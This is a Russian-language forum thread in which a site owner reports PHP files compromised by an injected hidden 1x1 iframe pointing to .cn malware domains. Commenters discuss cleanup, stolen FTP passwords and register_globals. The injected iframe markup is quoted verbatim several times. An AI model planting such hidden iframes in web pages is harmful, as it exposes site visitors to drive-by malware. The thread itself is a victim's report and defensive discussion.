Безопасность или глюк хостера

Сегодня открываю сайт — получаю следующее: Parse error: syntax error, unexpected '?' in /....../public_html/index.php on line 78 Скачал index.php, открыл, в самом конце после
</table>
</fieldset>
наблюдаю
<? } ?<html><body><iframe src="http://diettopseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe></body></html>>


Во всем остальном index.php не изменился. Что это было? Может глюк на хостинге? Очень хочется верить именно в это. На всякий случай пишу, пусть Макс в курсе будет, мало ли что может быть.

18 комментариев

avatar

Ниче не понимаю…в config.php в конце тоже самое ?<html><body><iframe src="diettopseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe></body></html>> Сейчас буду с хостером разбираться…
avatar
А не вирус ли это?
avatar
xerax.ru/wps/ меняйте пароли, быстрейщего выздоровления
avatar

Вот проклятые китайцы, в 111 файлах эта хрень… никто не подскажет как бы автоматизировать процес замены в файлах ?<html><body><iframe src="diettopseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe></body></html>> на ?> Или все таки ручками каждый файл придется исправлять?
avatar
залить из вчерашнего бекапа
avatar
я лечил через ssh, поиском в mc
avatar
Воспользуйся софтинкой www.searchandreplace.com/search_replace.htm весьма полезная в хозяйстве :)
Умеет искать и заменять по маске фрагменты в куче файлов.
avatar
забыл добавить ссылку на скачивание www.searchandreplace.com/dwld/sredown.cgi
avatar
Спасибо ребята, все исправил.
avatar
Никто, кстати не знает как это появляется. Просто у меня собственный сервак и я все с нуля сам настраивал, — вот, так что не стал бы сам себе заливать рекламу…

Есть мнение что имеется уязвимый скрипт, — через который и происходит дозапись, по всем файлам…
  • Lego
  • 0
avatar
Распространённая проблема, в 99% случаев вызывается компрометацией паролей для доступа по фтп. Пароль могли тупо подобрать либо, что более вероятно, украсть при помощи трояна.
avatar
Опять проклятые китайцы… 3 месяца все было спокойно и вот вчера опять. На этот раз:
<code>?<html><body><iframe src="http://coolnameshop.cn/in.cgi?income22" width=1 height=1 style="visibility: hidden"></iframe></body></html>></code>

Как бороться с этой хренью? Подскажите может как то можно блокировать доменную зону cn? Может у меня хостер дырявый? Ни у кого ничего такого не было? Спасибо.
avatar
смените пароль на фтп
avatar
Я вот использую WinSCP для работы с удаленными файлами. Отключил ftp вообще и не парюсь )
avatar
Тоже перешел на WinSCP, спасибо за подсказку.
avatar
И проверьте включен ли register_globals, если да, то выключите его нафиг.
avatar
Блин, у хостера еще и register_globals On, надо в .htaccess off прописать, а я тут демагогию развожу:) Спасибо огромное за наводки, что то я расслабился:)
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.